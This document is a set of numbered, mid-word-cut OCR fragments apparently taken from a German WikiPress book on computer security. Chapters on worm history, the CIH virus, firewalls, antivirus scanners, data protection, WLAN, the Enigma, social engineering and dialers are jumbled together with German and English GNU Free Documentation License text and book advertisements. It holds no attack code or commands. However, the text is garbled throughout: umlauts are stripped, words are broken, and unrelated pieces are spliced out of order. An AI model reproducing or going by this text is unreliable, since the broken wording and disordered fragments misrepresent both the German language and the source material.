weitere Registrierungsm glichkeiten im W B Filter Verfahren z B ber
502. te bezeichnet werden k nnen und kein kopiertes Material aus dem Dokument enthalten k nnen Sie nach Belieben einige oder alle diese Abschnitte als unver nderliche Abschnitte kennzeichnen F gen Sie dazu Ihre Titel zum Verzeichnis der unver nderlichen Abschnitte im Lizenzhinweis der modifizierten Version hinzu Diese Titel m ssen sich von allen anderen Abschnittstiteln unterscheiden Sie k nnen einen Empfehlungen berschriebenen Abschnitt hinzuf gen vorausgesetzt dieser enth lt nichts als Empfehlungen Ihrer modifizierten Version von verschiedenen Seiten zum Beispiel Feststellungen aus einem Expertengutachten oder dass der Text von einer Organisation als ma gebliche Definition eines Standards empfohlen wurde Sie k nnen einen Absatz mit bis zu f nf Worten als vorderen Umschlagtext und bis zu 25 Worten als hinteren Umschlagtext an das Ende der Liste mit den Umschlagtexten der modifizierten Version stellen Von jedem Rechtstr ger oder auf seine Anordnung hin darf nur je ein Absatz f r den vorderen und hinteren Umschlagtext hinzugef gt werden Wenn das Dokument bereits einen Umschlagtext f r denselben Umschlag enth lt der zuvor von Ihnen oder auf Anordnung des Rechtstr gers in dessen Namen Sie t tig sind hinzugef gt wurde d rfen Sie keinen weiteren hinzuf gen Sie k nnen aber den alten ersetzen wenn Sie die ausdr ckliche Genehmigung des vorherigen Herausgebers haben der den alten Absatz hinzugef gt hat Der die Autor
503. te die es heute hat Bis dahin konnten sich Computer viren viel schneller verbreiten Mitte der 1990er bis 2000 In diesem Zeitraum entwickelten sich die Computerw rmer wieder Erst im Jahr 1997 l utete der erste E Mail Wurm ein neues Zeitalter f r Netzwerk W rmer ein Er ist in der Ma krosprache VBA f r Microsoft Word 6 7 geschrieben und wird ShareFun genannt Im selben Jahr wurde auch noch der erste Wurm entdeckt der sich ber IRC verbreiten kann Er benutzte dabei die script ini Datei des Pro gramms mIRC Ein weiteres pr gendes Ereignis in diesem Jahr war die Entdeckung des Wurms Homer der als erster f r seine Verbreitung das Transferprotokoll FTP ben tzt Ab diesem Zeitpunkt wurde klar dass auch Netzwerkproto kolle von W rmern ausgenutzt werden k nnen Das Jahr 1999 war f r W rmer sehr entscheidend Einerseits verbrei tete sich ber Outlook der E Mail Wurm Melissa weltweit und sorgte f r gro e Aufmerksamkeit der Medien Andererseits wurden erstmals auch komplexe W rmer wie Toadie der sowohl DOS als auch Win dows Dateien infiziert und sich ber IRC und E Mail verbreitete und W32 Babylonia der sich als erste Malware selbst updaten konnte ent wickelt Im Jahr 2000 geriet ein Wurm besonders ins ffentliche Bewusstsein Mit seinem massiven Auftreten inspirierte der I love you E Mail Wurm viele Nachahmer 2001 bis heute Eine wichtige Entwicklung im Jahr 2001 war das Auf treten der ersten W rmer mit e
504. teful Inspection merkt sich dagegen den Status einer Verbindung und kann ein neues Datenpaket einer bestehenden Verbindung zuordnen Diese Information kann als wei teres Filterkriterium herangezogen werden Im Gegensatz zu einem Proxy wird aber die Verbindung selbst nicht beeinflusst Der Vorteil von Stateful Inspection anhand eines Beispiels Kommuniziert ein Rechner A mit einem Rechner B ber einen einfachen Paketfilter so muss dieser zwei Verbindungen erlauben NAT und hn liches weggelassen Quelle A nach Ziel B Quelle B nach Ziel A f r die Antwortpakete 9 Software Das bedeutet dass beide Rechner die Kommunikation aufnehmen k n nen da es keine M glichkeit gibt zu kl ren wer anfangen darf Bei Stateful Inspection wird nur eine Regel ben tigt bzw die zweite wird implizit hinzugef gt Quelle A nach Ziel B Der Paketfilter merkt sich dass Rechner A mit Rechner B kommuniziert und erlaubt auch Antworten darauf von Rechner B an Rechner A Rech ner B kann aber nicht beginnen Im Normalfall wird auch auf Quell und Zielport getestet diese d rfen sich nicht mehr ndern damit sie zur glei chen Verbindung geh ren und somit die Kommunikation auf genau eine m gliche Kommunikation beschr nkt Noch weitergehende Systeme pr fen zus tzlich ob ein Paket zu einem bestimmten Zeitpunkt in der Kommunikation berhaupt erlaubt ist zum Beispiel weitere Pakete zu schicken obwohl der andere Teilnehmer die Kommunikation b
505. teht nur selten aus einer einzigen Komponente Elisabeth D Zwicky Literatur 2001 S 34 schreibt Die Welt ist voll von Leuten die darauf bedacht sind Ihnen weiszumachen dass etwas keine Firewall ist Wenn es dazu gedacht ist die b sen Jungs von Ihrem Netz werk fernzuhalten dann ist es eine Firewall Wenn es erfolgreich die b sen Jungs fernh lt ist es eine gute wenn nicht ist es eine schlechte Firewall Das ist alles was es dazu zu sagen gibt Personal Firewall als SchutzmaBnahme Personal Firewalls bilden oftmals einen Teil der Absicherung privater PCs mit Internetzugang Ihr Einsatz wird unter anderem von Microsoft und in einigen Publikationen des Heise Verlags empfohlen Das Bundesamt f r Sicherheit in der Informationstechnik BSI hat die Personal Firewall als empfohlene Schutzma nahme f r Nutzer des Internets aufgelistet Das Amt warnt davor sich auf eine PFW als alleinige Schutzma nahme zu 98 Personal Firewall verlassen Weitere Absicherungen sind Viren und Spywarescanner re gelm ige Datensicherung Backup baldiges Aktualisieren Update der eingesetzten Software nach Bekanntwerden einer Sicherheitsl cke m g lichst sichere Konfiguration von Webbrowser E Mail Programm und Be triebssystem und generell ein vorsichtiger Umgang mit dem Internet Eine eindeutige Aussage ob eine Personal Firewall auf dem PC eines Privatan wenders f r sinnvoll gehalten wird trifft das BSI nicht Auf Kritik sti
506. tellung weiter zu beschr nken als es die einzelnen Werke erlauben Wenn das Dokument in eine Zusammenlegung eingebunden ist so gilt diese Lizenz nicht f r diejenigen anderen Werke dieser Zusammenlegung die selber keine Bearbeitung des Dokuments sind Wenn die Bestimmung f r den Umschlagtext aus Paragraph 3 aufdiese Kopien des Dokuments anwendbar ist dann k nnen wenn das Dokument weniger als die H lfte der gesamten Zusammenlegung ausmacht die Umschlagtexte des Dokuments auf Umschl ge gesetzt werden die das Dokument innerhalb der Zusammenlegung umschlie en oder auf das elektronische quivalent eines Umschlags sofern das Dokument in elektronischer Form vorliegt Andernfalls m ssen sie auf gedruckten Umschl gen erscheinen die die gesamte Zusammenlegung umschlie en 8 BERSETZUNG Bei bersetzungen handelt es sich um eine Art von Ver nderung somit k nnen Sie bersetzungen des Dokumentes unter den Bestimmungen des Paragraphen 4 verbreiten Um die unver nderlichen Abschnitte durch bersetzungen zu ersetzen ben tigen Sie die spezielle Erlaubnis des Copyright Inhabers Sie k nnen jedoch den Originalversionen der unver nderlichen Abschnitte bersetzungen einiger oder aller unver nderlichen Abschnitte hinzuf gen Sie k nnen eine bersetzung dieser Lizenz und aller Lizenzhinweise im Dokument sowie aller Haftungsausschl sse hinzuf gen vorausgesetzt dass Sie ebenso die englischsprachige Originalversion dieser Lizenz und alle orig
507. ten berschrieben Des Weiteren versucht er das BIOS des Rechners auch zu berschreiben Dies funktioniert allerdings nur bei Rechnern mit Intel 430TX Chips tzen Ist 49 Viren W rmer Trojaner das berschreiben des BIOS erfolgt startet der betroffene PC nicht mehr es muss der BIOS Chip auf der Hauptplatine ausgetauscht werden Das erste Mal tauchte der Virus am 2 Juni 1998 in Taiwan auf ver breitete sich jedoch sp ter auf der ganzen Welt Die Verbreitung wurde offenbar dadurch beg nstigt dass raubkopierte Software mit dem Virus verseucht war Aber auch kommerzielle Quellen waren von CIH betroffen Im August 1998 war ein Download zum Spiel Wing Commander infiziert Auch Heft CDs von europ ischen Spiele Magazinen sowie ein Firmware Update eines Yamaha CD Laufwerks waren betroffen Einige IBM Aptiva PCs wurden im M rz 1999 von CIH infiziert ausgeliefert Am 26 April 1999 wurde die Schadensroutine von CIH erstmals aktiviert Weltweit wa ren unz hlige Rechner vom Virus betroffen Quelle http de wikipedia org wiki CIH Virus Historie 21 4 04 Angelegt von Uebs danach bearbeitet von den Hauptautoren Uebs MichaelDiederich Zwobot anonym 12 1 06 1 2 06 WikiPress Redaktion Computerwurm Ein Computerwurm ist ein selbstst ndiges Computerprogramm das sich ber Computernetzwerke verbreitet wie zum Beispiel durch Versenden in fizierter E Mails selbstst ndig durch eine SMTP Engine oder durch ein E Mail Programm durch
508. ten in ihrer Erkl rung von Montreux dar ber hinaus an die international anerkannten Datenschutzprinzipien erinnert Diese sind Prinzip der Zul ssigkeit und Rechtm igkeit der Erhebung und Verar beitung der Daten Prinzip der Richtigkeit Prinzip der Zweckgebundenheit Prinzip der Verh ltnism igkeit Prinzip der Transparenz Prinzip der individuellen Mitsprache und namentlich der Garantie des Zugriffsrechts f r die betroffenen Personen Prinzip der Nicht Diskriminierung Prinzip der Sicherheit Prinzip der Haftung Prinzip einer unabh ngigen berwachung und gesetzlicher Sanktionen Prinzip des angemessenen Schutzniveaus bei grenz berschreitendem Datenverkehr Literatur B umler Helmut E Privacy Datenschutz im Internet Vieweg Verlag ISBN 3 528 03921 3 Garstka Hansj rgen Informationelle Selbstbestimmung und Daten schutz Das Recht auf Privatsph re Kongehl Gerhard Hrsg Datenschutz Management in Unternehmen und Beh rden Haufe 2005 ISBN 3 8092 1705 0 Rofnagel Alexander Handbuch Datenschutzrecht Verlag C H Beck 2003 ISBN 3 406 48441 7 Schulzki Haddouti Christiane Biirgerrechte im Netz Bundeszentrale fiir politische Bildung ISBN 3 8100 3872 5 Schulzki Haddouti Christiane Vom Ende der Anonymit t Die Globa lisierung der Uberwachung ISBN 3 88229 185 0 Schulzki Haddouti Christiane Datenjagd Eine Anleitung zur Selbst verteidigung ISBN 3 434 53089 4 Str m Par Die berwachungsmafia Das
509. tenschutz gesetz der EKD DSG EKD in der r misch katholischen Kirche die An ordnung ber den kirchlichen Datenschutz KDO und in der alt katholi schen Kirche die Ordnung ber den Schutz von personenbezogenen Daten Datenschutz Ordnung DSO im Bereich des Katholischen Bistums der Alt Katholiken in Deutschland Verfahren Hauptprinzipien des Datenschutzes sind Datenvermeidung und Datensparsamkeit Erforderlichkeit Zweckbindung Sind dennoch Daten einmal angefallen so sind technisch organisatori sche Ma nahmen zur Gew hrleistung des Datenschutzes zu treffen Da tensicherheit Hierzu geh rt insbesondere die Beschr nkung des Zugriffs auf die Daten auf die jeweils berechtigten Personen F r automatisierte Abrufverfahren Online Verfahren sind besondere Regeln zu beachten Aus den Prinzipien der Datensparsamkeit und der Erforderlichkeit folgt dass Daten zu l schen sind sobald sie nicht mehr ben tigt werden Nicht mehr erforderliche Daten die wegen gesetzlicher Aufbewahrungs und Dokumentationspflichten insbesondere im Steuerrecht nicht ge l scht werden d rfen sind zu sperren Zu den grundlegenden Datenschutzanforderungen geh ren ferner die unabdingbaren Rechte der Betroffenen insbesondere das Recht auf Aus kunft ber die zu der jeweiligen Person gespeicherten Daten und eine unabh ngige Datenschutzaufsicht 18 Datenschutz Auf der Internationalen Datenschutzkonferenz 2005 haben die Daten schutzbeauftrag
510. the section titles M Delete any section Entitled Endorsements Such a section may not be included in the Modified Version N Do not retitle any existing section to be Entitled Endorsements or to conflict in title with any Invariant Section O Preserve any Warranty Disclaimers If the Modified Version includes new front matter sections or appendices that qualify as Secondary Sections and contain no material copied from the Document you may at your option designate some or all of these sections as invariant To do this add their titles to the list of Invariant Sections in the Modified Version s license notice These titles must be distinct from any other section titles You may add a section Entitled Endorsements provided it contains nothing but endorsements of your Modified Version by various parties for example statements of peer review or that the text has been approved by an organization as the authoritative definition of a standard You may add a passage of up to five words as a Front Cover Text and a passage of up to 25 words as a Back Cover Text to the end of the list of Cover Texts in the Modified Version Only one passage of Front Cover Text and one of Back Cover Text may be added by or through arrangements made by any one entity If the Document already includes a cover text for the same cover previously added by you or by arrangement made by the same entity you are acting on behalf of you may not add another but you may
511. ting Manche Access Points APs bieten die M glichkeit in einen Bridging Repeating Modus zu wechseln Hierbei konnen zwei oder mehrere APs zu einem Verbund zusammengeschaltet werden Diese Verschaltung findet auf der Ebene der MAC Adresse Schicht 2 im OSI Modell statt Im Be trieb als Bridge Briicke bei dem zwei APs zusammengeschlossen wer den ohne dass weitere Clients Zugang erhalten dienen die APs sozusagen als Ersatz eines Kabels Point to Point Verbindung Im Repeating Mo dus Point to Multi Point werden mehrere Access Points miteinander verbunden und zus tzlich k nnen sich Clients wie Laptops verbinden Damit kann man die Reichweite eines einzelnen WLAN Netzes erh hen Diese Funktionalit t wird Wireless Distribution System WDS genannt Es handelt sich jedoch nicht um eine Hersteller bergreifende Norm so dass es nicht gew hrleistet ist dass zwei Ger te unterschiedlicher Herstel ler sich verst ndigen k nnen Nachteile 1 F r jeden zus tzlichen AP im Bridging Mode halbiert sich die ber tragungsleistung da die Daten ber den gleichen Kanal geschickt wer den und f r jeden AP erneut geschickt werden m ssen Bei Ger ten die mehrere Standards unterst tzen zum Beispiel IEEE 802 11b und g k nnen die WDS Bridge auf 802 11g laufen und die Clients auf IEEE 244 Wireless LAN 802 11b Somit reduziert sich die Datenrate f r die Clients an einem AP nicht und zwischen Clients von verschiedenen APs nur min
512. tions You must delete all sections Entitled Endorsements 6 COLLECTIONS OF DOCUMENTS You may make a collection consisting of the Document and other documents released under this License and replace the individual copies of this License in the various documents with a single copy that is included in the collection provided that you follow the rules of this License for verbatim copying of each of the documents in all other respects You may extract a single document from such a collection and distribute it individually under this License provided you insert a copy of this License into the extracted document and follow this License in all other respects regarding verbatim copying of that document 7 AGGREGATION WITH INDEPENDENT WORKS A compilation of the Document or its derivatives with other separate and independent documents or works in or on a volume of a storage or distribution medium is called an aggregate if the copyright resulting from the compilation is not used to limit the legal rights of the compilation s users beyond what the individual works permit When the Document is included in an aggregate this License does not apply to the other works in the aggregate which are not themselves derivative works of the Document 329 Anhang Ifthe Cover Text requirement of section 3 is applicable to these copies of the Document then if the Document is less than one half of the entire aggregate the Document s Cover Texts may be pla
513. tis stellen Es bietet gleicherma en span nende und faszinierende Fakten ber den sechs ten und unbekanntesten Kontinent der Erde Antarktis Geographie Geschichte Natur WikiPress 4 ISBN 3 86640 004 7 9 90 Fahrr der F r viele Menschen ist das Fahrrad ein Alltags gegenstand den sie wie selbstverst ndlich be nutzen Sp testens jedoch wenn irgendetwas nicht funktioniert macht man sich Gedanken ber die Funktionsweise der Teile Dieses Buch istkeine Reparaturanleitung sondern erkl rt die vielf ltigen Fahrradtypen sowie den Aufbau von Schaltungen Bremsen und Beleuchtungen Au das wichtigste Zubeh r von der Packtasche bis zur Luftpumpe wird ebenso eingegangen wie auf Fahrradwerkzeug und die passende Be kleidung Doch nicht nur die Technik wird dem Leser leicht verst ndlich n her gebracht er fin det auch Tipps zu Radtouren quer durch ganz Deutschland Fahrr der Technik Typen Praxis WikiPress 8 ISBN 3 86640 008 X 8 90 WIKI Aus der fraian Enzyilon die Wikipedia PRESS wusammengestellt von Achim Raschka Antarktis hict ew bree here ae Fahrrader Viren W rmer Trojaner Computer sind heute einer Vielzahl von virtuellen Angriffen ausgesetzt Hinzu kommen E Mail Betr gereien wie das Phishing bei dem sensible Daten erfragt werden sowie wenig harmlose Scherze die als Hoaxes bezeichnet werden oder auch einfach massenweise Spammails All diese Ge
514. tomatisch beim Hersteller aktuelle Virensignaturen heruntergela den werden ist bei Virenscannern von besonderer Bedeutung Wenn sie aktiviert ist wird der Benutzer regelm ig daran erinnert nach aktu 78 AntiVir ellen Updates zu suchen bzw die Software sucht selbstst ndig danach Es empfiehlt sich diese Option zu nutzen um sicher zu gehen dass das Programm wirklich auf dem aktuellen Stand ist Die H ufigkeit mit der Updates von den Herstellern bereitgestellt werden sagt jedoch nichts direkt ber die Qualit t des Produktes aus Wichtiger ist dass bei einer bestehenden Bedrohung m glichst zeitnah eine entsprechende Signatur ver ffentlicht wird Reaktionszeit Hersteller von Antivirensoftware Folgende Hersteller bieten Antivirensoftware an BitDefender Cla mAV Computer Associates CP Secure Eset NOD32 F Secure G Data H BEDV Kaspersky McAfee Norman Panda Antivirus Trend Micro Sophos Symantec Online Virenscanner Online Virenscanner arbeiten im Gegensatz zu fest installierten Viren scannern nur im On Demand Modus D h der persistente Schutz durch einen On Access Modus ist nicht gew hrleistet Deshalb eignen sich On line Virenscanner zwar zum Reinigen nicht aber zum pr ventiven Schutz eines Systems Oft werden Online Virenscanner auch als so genannte Second Opinion Scanner benutzt um sich zus tzlich zum installierten Virenscanner eine zweite Meinung zu eventuellen Befall einzuholen Die meisten Onli
515. triebssystem aktiv werden k nnen sie au erdem nicht auf von einem Betriebssystem bereitgestellte Funktionen wie das Finden und ffnen ei ner Datei zur ckgreifen Seit 2005 gibt es auch Bootsektorviren f r CD ROMs Diese infizieren bootf hige CD ROM Image Dateien ISO Images Es ist technisch m g lich ein Bootsektorvirus f r einen USB Stick oder f r ein LAN Netzwerk zu erstellen dies ist aber bis 2005 noch nicht geschehen 29 Viren W rmer Trojaner Heutzutage gibt es beinahe keine Bootsektorviren mehr da BIOS und Betriebssysteme meistens einen gut funktionierenden Schutz vor ihnen haben Zwar gibt es Bootsektorviren die diesen Schutz umgehen k nnen doch ist ihre Verbreitung im Allgemeinen sehr langsam Durch die tech nischen Probleme die mit diesem Virentyp einhergehen fordern sie vom Virenautor au erdem deutlich mehr Wissen und Programmierfertigkei ten w hrend sie zugleich seine M glichkeiten stark einschr nken Dateiviren Linkviren Linkviren oder Dateiviren sind der am h ufigs ten anzutreffende Virentyp Sie infizieren ausf hrbare Dateien oder Pro grammbibliotheken auf einem Betriebssystem Um eine ausf hrbare Datei zu infizieren muss das Virus sich in die se Wirtsdatei einf gen oft direkt am Ende da dies am einfachsten ist Au erdem modifiziert das Virus die Wirtsdatei so dass das Virus beim Programmstart aufgerufen wird Eine spezielle Form von Linkviren w hlt eine andere Strategie und f gt s
516. tschl sselung Die Algorithmen zur Ver bzw Entschl sselung m ssen nicht identisch sein Ebensowenig m ssen identische Schl ssel zum Einsatz kommen Das Forschungsgebiet der Entschl sselung hei t Kryptoanalyse und ist nat rlich eng verwandt mit der Kryptografie In der zwischenmenschlichen Kommunikation spricht man allgemei ner von verschl sselten Informationen wenn diese zwecks Transport an ein Gegen ber mittels Symbolen erfolgt Als Symbole dienen hierbei z B Sprache Mimik Gestik Lautierungen Das richtige Verstehen ei ner Nachricht die entsprechende Deutung der Symbole durch das ge gen ber kann unter Umst nden problematisch sein weil eine korrekte Deutung der Symbole im Sinne der Absicht des Senders nicht immer gelingt 281 Kryptografie Kryptografie und Kryptoanalyse Als Vertreter historisch gegens tzlicher Interessen stehen sich Kryp tografen und Kryptoanalytiker gegen ber Die Entwicklung der Verschl sselungstechniken erfolgte meist im Milit r Die eine Seite Kryptografen versuchte ihre Nachrichten zu verschl sseln die Ge genseite Kryptoanalytiker versuchte diese zu entziffern Heute ist die Forschung auf dem Gebiet der Verschl sselung wesentlich breiter Es gibt zahlreiche Personen wie auch Institutionen die sowohl neue Ver schl sselungstechniken entwickeln als auch gleichzeitig versuchen be stehende zu brechen In der Hoffnung einem kryptografischen Verfahren dadurch zus tz liche Sicherh
517. tzutage h ufig das Internet welches als unvertrauensw rdig gilt Untrusted die so genannte demilitarisierte Zone DMZ in der vom externen Netz aus erreichbare Server beherbergt sind das interne Netz LAN welches als vertrauensw rdig gilt Trusted Es kann auch mehrere DMZ s typisch 3 6 mit jeweils anderen Rechten geben um z B sehr gut gewarteten Servern mehr Rechte im LAN zu geben als Servern die bekannt schlecht gewartet sind Dies geht bis zum kom pletten Ausschluss aus dem LAN Verbindung nur zum WAN Oftmals handelt es sich bei einer Hardware Firewall jedoch um eine Software Firewall die mit spezieller Hardware geb ndelt wird Host Firewall Handelt es sich bei der Hardware auf welcher die Firewall Software l uft nicht um ein spezifisches Ger t sondern um beispielsweise einen PC mit 88 Firewall Linux Windows oder auch eine Sun Workstation so wird eher Bezug auf die spezielle Software genommen und man nennt es dann Software Fire wall So werden zum Beispiel Personal Firewalls als Software Firewalls bezeichnet weil sie ja normalerweise auf dem auch f r andere Zwecke verwendeten PC laufen Die Softwarekomponente der Firewall arbeitet auf den Schichten 2 bis 7 des OSI Referenzmodells und demzufolge kann das Implementations niveau sehr unterschiedlich ausfallen Deswegen besteht eine Firewall oft aus verschiedenen Softwarekomponenten Die verschiedenen Teile sollen hier kurz beschrieben werden Pak
518. ualifizierte Zertifikate sind der eigenh ndi gen Unterschrift gleichgestellt Der Begriff qualifiziertes Zertifikat ist eine Abk rzung f r fortgeschrittene Signaturen die mit einer sicheren Signaturerstellungseinheit erstellt wurden die sich in der alleinigen Verf gung des Inhabers befindet Bei qualifizierten Zertifikaten sind die ge setzlichen Vorgaben exakt Unter anderem biometrische Daten Meldeanschrift des Zertifikat Inhabers Einher gehen auch h here Anspr che an die Speicherung Sicherung des qualifizierten Zertifikats aufbesonderen Medien wie z B auf SmartCarts oder Token Akkreditierte Zertifikate Teilweise wird auch der Begriff akkreditierte digitale Zertifikate genutzt die Akkreditierung bezieht sich hierbei je doch nicht auf das Zertifikat sondern auf die Zertifizierungsstelle Dies ist somit kein eigener Zertifikat Typ Es sind faktisch qualifizierte Zerti fikate deren Zertifizierungsstelle akkreditiert wurde N here Informati onen finden Sie unter dem Punkt Bedeutung des Status der Zertifizie rungsstellen Probleme Zertifikate werden von vielen Stellen ausgegeben Damitein Zertifikatals g ltig betrachtet wird muss man der Zertifizierungsstelle vertrauen In Webbrowsern sind aus diesem Grund schon viele Zertifizierungsstellen als vertrauenw rdig eingestuft z B im Internet Explorer Extras gt Internetoptionen gt Inhalte gt Zertifikate gt vertrauensw rdi 147
519. uch den Faktor 676 wieder streichen Ubrig bleiben nur die 120 17576 M glichkeiten 21 Bit durch Wal zenlage und Grundstellung So schrumpft der vorher noch so gigantisch erscheinende Schl sselraum auf vergleichsweise winzige 120 17576 2 109 120 zwei Millionen M glichkeiten eine Zahl die auch bereits 304 Enigma zu Zeiten des Zweiten Weltkriegs mit Hilfe der damaligen elektrome chanischen Technik leicht vollst ndig exhaustiv abgearbeitet werden konnte Kryptografische Schw chen Willi Korn erreichte durch die Umkehrwalze dass das Schl sselverfah ren involutorisch wird das hei t wenn bei einer bestimmten Stellung der Walzen ein U in ein X verschl sselt wird dann wird bei dieser Stellung auch ein X in ein U verschl sselt So vereinfachte er die Bedienung der Maschine denn man muss nicht mehr zwischen Verschl sselung und Entschl sselung unterscheiden Dar ber hinaus erhoffte er sich wohl auch eine Steigerung der Sicherheit denn der Strom durchflie t die Wal zen janun zweimal Dies war jedoch ein Trugschluss mit weitreichenden Konsequenzen Zum einen bewirkt die Umkehrwalze dass nun kein Buchstabe mehr in sich selbst verschl sselt werden kann denn der Strom kann ja in keinem Fall genau den Weg durch den Walzensatz wieder zur cknehmen den er gekommen ist Er wird stets auf einem anderen Weg zur ckgeleitet als er zur Umkehrwalze hingeflossen ist Mathematisch spricht man hier von fixpunktfreien Permutationen D
520. uch wieder Privatan wender an Im Jahr 2004 wurde der Wurm Mydoom das erste Mal gesichtet Die schnelle Verbreitung des Wurms f hrte f r ein paar Stunden zu einer durchschnittlich 10 prozentigen Verlangsamung des Internetverkehrs und einer durchschnittlich erh hten Ladezeit der Webseiten 50 Prozent In den Jahren 2004 und 2005 wurden die ersten Computerw rmer f r Handys entdeckt die sich auf Smartphones mit dem Betriebssystem Sym bian OS verbreiten SymbOS Caribe war der erste Handywurm der sich mit der Bluetooth Netzwerktechnologie weiterverbreitet Im Januar 2005 erschien mit SymbOS Commwarrior dann der erste Wurm der sich selbst als MMS verschicken kann Die Verbreitung von Handyw rmern wird mittlerweile von mehreren Antivirenprogramm Herstellern gemeldet Vor allem bei gro en Veranstaltungen gibt es immer wieder Masseninfek tionen durch Bluetooth W rmer Literatur Biggs John Black Hat Misfits Criminals and Scammers in the Inter net Age Apress Berkeley Cal 2004 ISBN 1 59059 379 0 englisch 61 Viren W rmer Trojaner Burger Ralf Das gro e Computer Viren Buch Data Becker D sseldorf 1989 ISBN 3 89011 200 5 Szor Peter The Art OfComputer Virus Research And Defense Addison Wesley Upper Saddle River NJ 2005 ISBN 0 321 30454 3 englisch Quelle http de wikipedia org wiki Computerwurm Historie 20 5 03 Angelegt von Warp danach bearbeitet von den Hauptautoren Mario23 Hendrik vm Oliver Schad
521. uchen Dasselbe Prinzip wurde bald auch f r die Interneteinwahl genutzt Der Anbieter eines Internet Dienstes l sst seine Kunden ber eine 09009 Nummer einw hlen und verdient an den f lligen teilweise hohen Onlinegeb hren Die Verbindungskosten sind meist deutlich h her als bei normalen Internet Verbindungen was sich aus der Abrechung der zur Verf gung gestellten Dienstleistung ergibt Anders als bei den fr heren 0190 Nummern gibt es keine einheitlichen Geb hren f r spezielle 0900 Einwahlnummern Diese m ssen jedoch nun angesagt werden 108 Dialer Es gibt auch so genannte DSL Dialer Allerdings ist diese Bezeichnung nicht ganz korrekt Es lassen sich per DSL keine 0190 0900 Geb hren abrechnen Deswegen muss man mit seinem Telefon eine 0900 Ruf nummer w hlen um ein bestimmtes Angebot in Anspruch nehmen zu k nnen Solange diese Verbindung besteht kann der Kunde ein kosten pflichtiges Internet Angebot besuchen Wenn man dann den H rer auf legt wird das Angebot z B eine Website nicht l nger zur Verf gung gestellt Missbr uchliche Dialer Heute denkt man jedoch beim Begriff Dialer gew hnlich an solche Dialer die von unseri sen teilweise sogar kriminellen Anbietern ver breitet werden um ohne ausdr ckliche oder nur unzureichende Zu stimmung des Kunden von diesem erh hte Geb hren abzurechnen Seit November 2003 ist der Begriff 0190 Dialer allerdings nicht mehr ganz korrekt Damals wurde f r Dialer in De
522. umann Stern Steven Malkovich Derda anonym 12 1 06 1 2 06 WikiPress Redaktion Social Engineering Social Engineering auch Social Hacking ist das Erlangen vertraulicher Informationen durch Ann herung an Geheimnistr ger mittels gesell schaftlicher Kontakte Dieses Vorgehen wird von Geheimdiensten und Privatdetektiven seit langem praktiziert der Begriff wird jedoch meist im Zusammenhang mit Computerkriminalit t verwendet da er hier das Ge genst ck zum rein technischen Vorgehen Engineering beim Eindringen in fremde Systeme bildet Beispiel Herr Meier arbeitet in einer Firma die ein neuartiges Produkt als Erste auf den Markt bringen will Er arbeitet in der Entwicklungsab teilung an einem Computer Um sich dem System gegen ber zu authen tifizieren ben tigt man einen Account und das dazugeh rige Passwort Nun ruft eines Tages ein vermeintlicher Kollege aus einer anderen Filiale des Unternehmens an und bittet Herrn Meier ihm seine Benutzerdaten zu geben da er Wartungen am Server durchf hren m sse Zwar kennt Herr Meier den Anrufer nicht aber durch die Art des Gespr chs vermittelt er den Eindruck dass er zum Unternehmen geh rt Meist n hern sich die Angreifer beim Social Engineering zun chst einem Mitarbeiter in einer untergeordneten Position etwa der Sekret 228 Social Engineering rin oder der Putzfrau um Gepflogenheiten und Umgangsformen in Er fahrung zu bringen Bei der Ann herung an den eigentlichen Ge
523. uncil eingerichtet Technische Details Spezifikationen Die erste wichtige Spezifikation damals noch von der TCPA wurde unter der Versionsnummer 1 1 im Juli 2001 vorgestellt den n chsten wichtigen Meilenstein stellte die berarbeitete Fassung 1 1b im Mai 2002 dar Im November 2003 erfolgte die letzte wichtige nderung zur TPM Main Specification Version 1 2 erstmals unter dem Dach der TCG Komponenten Die Leistungen die die TCG spezifiziert hat werden durch zwei Systemerweiterungen erbracht zum einen durch ein Trusted Platform Module TPM einen zus tzlichen Chip auf der Hauptplatine zum anderen durch eine BIOS Erweiterung namens Core Root of Trust Measurement CRTM Beide lassen sich vom Benutzer deaktivieren und auch wieder einschalten Die TCG Spezifikationen verzichten bewusst auf die Bezugnahme auf ein spezielles Betriebssystem Hierbei muss klar sein dass viele M glich keiten aber auch kritisierte Gefahren eines TCG konformen Systems ohne ein sicheres Betriebssystem sehr eingeschr nkt sind Was die Spezi fikation festschreibt sind spezielle Anforderungen die ein Betriebssystem erf llen muss um bestimmte Funktionen wahrzunehmen Bootvorgang Beim Hochfahren des Rechners wird zuerst das schon genannte Core Root of Trust Measurement CRTM aufgerufen das ber pr ft ob das TPM aktiviert ist Ist das nicht der Fall erfolgt ein norma ler Bootvorgang wie er auch heute schon auf jedem Rechner abl uft Ist
524. und Ausgewogenheit in der Wikipedia vertreten ist Dieses Buch w nscht sich Leser die es gleicher ma en interessiert und kritisch lesen Kein Wort ist nur dadurch wahr dass es in einer professionellen Druckerei auf gutem Papier gedruckt wur de Und dies gilt f r dieses Buch genau so wie f r jedes andere B cher sind Medien die Gedachtes Gemeintes und Gewusstes vom Autor zum Leser transportieren Das Medium das Sie in den H nden halten trans portiert das Ergebnis einer Kollektivarbeit zahlreicher Menschen Wie auch immer Sie dieses Buch nutzen entscheiden Sie am Ende selbst Vielleicht m chten Sie es auch einfach nur lesen Denn hierzu ha ben wir es Ihnen gedruckt und Sie haben es hierzu bei Ihrem Buchh ndler erworben Wir w nschen Ihnen mit diesem Buch viel Vergn gen Lesen Sie kri tisch Jedes Buch Immer Das Team von WikiPress 8 Vorwort In den letzten Jahren hat der Computer einen immer gr eren Stellenwert in unserer Gesellschaft eingenommen Eine Vernetzung fast aller elektro nischer Ger te hat begonnen und wird in Zukunft unser t gliches Leben noch deutlicher beeinflussen Hundertprozentige Sicherheit gibt es auch bei Computern nicht Fr her wurden Telefonleitungen berbr ckt um kostenlose Gespr che oder Internetverbindungen aufzubauen heute werden tausende von Compu tern zusammengeschaltet um Konkurrenten aus dem Markt zu dr ngen Benutzer werden ausspioniert und Online Bankkonten gepl ndert Fast
525. under this License However parties who have received copies or rights from you under this License will not have their licenses terminated so long as such parties remain in full compliance 10 FUTURE REVISIONS OF THIS LICENSE The Free Software Foundation may publish new revised versions of the GNU Free Documentation License from time to time Such new versions will be similar in spirit to the present version but may differ in detail to address new problems or concerns See http www gnu org copyleft Each version of the License is given a distinguishing version number If the Document specifies that a particular numbered version of this License or any later version applies to it you have the option of following the terms and conditions either of that specified version or of any later version that has been published not as a draft by the Free Software Foundation If the Document does not specify a version number of this License you may choose any version ever published not as a draft by the Free Software Foundation ADDENDUM HOW TO USE THIS LICENSE FOR YOUR DOCUMENTS To use this License in a document you have written include a copy of the License in the document and put the following copyright and license notices just after the title page Copyright c YEAR YOUR 